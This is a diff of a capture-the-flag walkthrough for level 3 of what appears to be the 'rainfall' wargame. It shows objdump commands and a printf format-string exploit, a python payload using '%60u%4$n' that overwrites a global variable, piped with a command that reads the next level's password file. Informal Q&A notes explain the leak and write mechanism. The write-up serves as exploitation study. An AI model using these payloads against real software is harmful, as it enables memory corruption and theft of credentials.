vladdez/rainfall/level3/walkthrough.md

 - offset code structure: 64 = 4 (global variable address) + 60 (padding)

 Code:
 objdump -d ./level3
 objdump -t level3
 ./level3
 111111 %p %p %p %p %p
 (python -c 'print "\x8c\x98\x04\x08 %x %x %x %x"';cat) | ./level3
-(python -c 'print "\x8c\x98\x04\x08" + "A" * 60 + "%4$n"'; echo "cat /home/user/level4/.pass") | ./level3
+(python -c 'print "\x8c\x98\x04\x08" + "%60u%4$n"'; echo "cat /home/user/level4/.pass") | ./level3

 QA
 - why the leakage of global varibale happens?
 - Printf has no specificators.
 If we pass %smth in the stdin, prinf will consider it as specificator.
 Printf will try to print arguments, when they end - prinf will use global variables

 - what is 0x200?
+- format parameter

 - how to find a global variable?
 - objdump -t level3 -> 0804988c g     O .bss   00000004              m

-- why padding is 64?

-- why we cannot just pass "A" * 60?

-- where exacly do we write the address of global variable
+- Where exacly do we write the address of global variable
+- The format string is usually located on the stack itself.
+Arguments of prinf should be located on the stack

 - how do we pass the global varibale?
-- "A" * 60 + "%4$n - here %n will write the number of preceding bytes (64) and put it the pointed location: the position of 4th argument (buffer)
+- "A" * 60 + "%4$n or "%60u%4$n" - %n modifier writes the number of preceding bytes (64) and puts it the pointed location: the position of 4th argument (buffer)

 Functions